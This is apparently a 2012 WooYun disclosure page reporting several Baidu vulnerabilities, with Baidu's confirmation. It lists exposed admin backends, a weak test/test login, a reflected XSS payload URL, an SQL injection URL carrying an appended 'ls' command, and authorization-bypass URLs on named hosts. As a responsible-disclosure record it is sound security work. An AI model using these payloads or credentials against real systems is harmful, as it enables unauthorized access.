当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-06777

漏洞标题:百度漏洞合集

相关厂商:百度

漏洞作者: Dico

提交时间:2012-05-07 17:36

修复时间:2012-06-21 17:36

公开时间:2012-06-21 17:36

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-05-07: 细节已通知厂商并且等待厂商处理中
2012-05-08: 厂商已经确认,细节仅向厂商公开
2012-05-18: 细节向核心白帽子及相关领域专家公开
2012-05-28: 细节向普通白帽子公开
2012-06-07: 细节向实习白帽子公开
2012-06-21: 细节向公众公开

简要描述:

百度漏洞合集

详细说明:

发现后台两枚:
http://sfcrm.baidu.com/ 百度客户管理系统
http://bnms.baidu.com/bnms/index.do 全国监控网 存在弱口令test/test
http://123.125.68.120/ 客户端软件评测中心
存在跨站:
http://123.125.68.120/clientva/web/p2p/fid_noseeder.php?date=2012-05-06%3Cscript%3Ealert(/xss/)%3C/script%3E
注入:
http://123.125.68.120/clientva/web/p2p/show.php?date="or 1=1/*;ls
客户端后端系统业务监控平台绕过授权直接登入
http://123.125.68.120/clientbeop/web/
绕过授权模式添加控件:
http://mic1.baidu.com:8091/static/ludi/control/
http://mic2.baidu.com:8091/static/ludi/control/
http://mic3.baidu.com:8091/static/ludi/control/
http://mic4.baidu.com:8091/static/ludi/control/
http://mic5.baidu.com:8091/static/ludi/control/
http://mic6.baidu.com:8091/static/ludi/control/
http://mic7.baidu.com:8091/static/ludi/control/
http://mic8.baidu.com:8091/static/ludi/control/
http://mic9.baidu.com:8091/static/ludi/control/
测试IP:113.116.89.38 下午闲来无聊手痒,怕跨省于我而提交之~切勿跨省我,3Q!有问题可发email于我~~

漏洞证明:




修复方案:

简单

版权声明:转载请注明来源 Dico@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2012-05-08 14:50

厂商回复:

此问题大部分为测试页面,后台两枚均为对公网开放部分,感谢提交

最新状态:

暂无